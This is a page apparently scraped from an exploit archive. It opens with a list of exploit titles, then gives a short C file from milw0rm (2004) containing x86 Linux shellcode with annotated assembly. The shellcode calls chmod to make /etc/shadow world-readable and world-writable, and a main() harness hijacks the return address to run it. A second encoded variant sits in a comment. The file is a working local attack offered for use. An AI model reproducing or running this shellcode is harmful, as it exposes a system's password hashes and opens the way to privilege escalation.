477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
45 lines
No EOL
1.4 KiB
C
Executable file
45 lines
No EOL
1.4 KiB
C
Executable file
/*
|
|
* s0t4ipv6@shellcode.com.ar
|
|
* 0x04abril0x7d2
|
|
*
|
|
* int sys_chmod(const char * filename, mode_t mode)
|
|
* {...}
|
|
*
|
|
* Utilizando la interrupcion 15(chmod), asignando el octal 0666
|
|
* al archivo deseado. En este caso /etc/shadow
|
|
*
|
|
* Hice unas modificaciones en el codigo y solo pude reducir la shellcode en 1.
|
|
* por el codigo mailme.
|
|
* "\x31\xdb\x68\x64\x6f\x77\x53\x68\x2f\x73\x68\x61\x68\x2f\x65"
|
|
* "\x74\x63\x89\xe3\x31\xc9\x88\x4c\x24\x0b\x66\xb9\xb6\x01\x31"
|
|
* "\xc0\xb0\x0f\xcd\x80\x31\xc0\x40\xcd\x80";
|
|
*
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
|
|
// Shellcode // Asm Code // Main Interval
|
|
char shellcode[]=
|
|
"\xeb\x17" // jmp 0x17 [3 ; 4]
|
|
"\x5e" // popl %esia [5]
|
|
"\x31\xc9" // xorl %ecx, %ecx [6 ; 7]
|
|
"\x88\x4e\x0b" // movb %ecx, 0xb(%esi) [8; 10]
|
|
"\x8d\x1e" // leal (%esi), %ebx [11;12]
|
|
"\x66\xb9\xb6\x01" // movw $0x1b6, %cx // asigno a cx el equivalente en hex al octal 0666
|
|
"\x31\xc0" // xorl %eax, %eax [17;18]
|
|
"\xb0\x0f" // movb $0xf, %al // Interrupcion 15 (chmod)
|
|
"\xcd\x80" // int $0x80 [21;22]
|
|
"\x31\xc0" // xorl %eax, %eax // salida
|
|
"\x40" // inc %eax [25]
|
|
"\xcd\x80" // int $0x80 [26;27]
|
|
"\xe8\xe4\xff\xff\xff" // call -0x1c
|
|
"/etc/shadow";
|
|
|
|
main() {
|
|
int *ret;
|
|
ret=(int *)&ret+2;
|
|
printf("Shellcode lenght=%d\n",strlen(shellcode));
|
|
(*ret) = (int)shellcode;
|
|
}
|
|
|
|
// milw0rm.com [2004-09-26]
|